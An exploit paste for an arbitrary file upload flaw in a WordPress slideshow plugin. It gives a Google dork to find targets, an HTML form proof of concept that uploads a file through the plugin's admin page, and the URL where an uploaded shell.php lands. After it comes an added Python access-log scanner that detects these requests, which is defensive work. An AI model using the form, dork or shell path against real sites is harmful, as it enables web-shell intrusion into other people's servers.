- <!--
- \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
- \ \ / /| | '__| | | / __|\ /| | | |_ /
- \ V / | | | | |_| \__ \/ \| |_| |/ /
- \_/ |_|_| \__,_|___/_/\_\____//___|
- -->
- #########################################################
- #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
- #Category: webapps
- #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
- #########################################################
- [+] Proof of Concept:
- The following proof of concept will create a new category in the plugin, with
- the selected file as the Category Image. If there are no pre-existing categories
- the uploaded file will be located in the directory
- /wp-content/uploads/vertical/1_uploadfolder/big/.
- Replace “[path to WordPress]” with the location of WordPress.
- <html>
- <body>
- <form action="http://[path to WordPress]/wp-admin/admin.php?page=vertical_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="vrt_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- [+] Shell access:
- http://www.Target.com/wp-content/uploads/vertical/1_uploadfolder/big/shell.php
- Video
- https://youtu.be/54ytssnD1JQ
- Bye..
- Algerien Hacker
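
For defenders, the two requests described above leave traces in the web server access log: a POST to the plugin's `vertical_manage` admin page, and a request for a non-image file under `/wp-content/uploads/vertical/`. The Python sketch below is an added example, not part of the original paste; it assumes Combined Log Format, and the sample log lines, the image-extension allowlist and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths taken from the advisory text; the allowlist is an assumption.
UPLOAD_PREFIX = "/wp-content/uploads/vertical/"
ADMIN_PATH = "/wp-admin/admin.php"
ADMIN_PAGE = "vertical_manage"
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2016:13:55:36 +0000] "POST /wp-admin/admin.php?page=vertical_manage HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2016:13:55:41 +0000] "GET /wp-content/uploads/vertical/1_uploadfolder/big/shell.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2016:14:02:10 +0000] "GET /wp-content/uploads/vertical/1_uploadfolder/big/cat.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2016:14:02:12 +0000] "GET /blog/wp-content/uploads/vertical/1_uploadfolder/big/x.phtml HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (severity, reason, ip, path) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = unquote(parts.path)
    lower = path.lower()
    # WordPress may live in a subdirectory, so match the prefix anywhere.
    if UPLOAD_PREFIX in lower:
        name = lower.rsplit("/", 1)[-1]
        ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
        if name and ext not in IMAGE_EXTS:
            sev = "high" if m["status"] == "200" else "medium"
            return (sev, "non-image file in plugin upload dir", m["ip"], path)
    # The upload itself is in the POST body, which access logs do not record,
    # so any POST to the management page is only worth a manual review.
    if m["method"] == "POST" and lower.endswith(ADMIN_PATH):
        if ADMIN_PAGE in parse_qs(parts.query).get("page", []):
            return ("review", "POST to plugin management page", m["ip"], path)
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep=" | ")
```

A "high" hit means the server answered 200 for a non-image file in the plugin's upload directory; correlating its client IP with a preceding "review" hit narrows down when the file was uploaded.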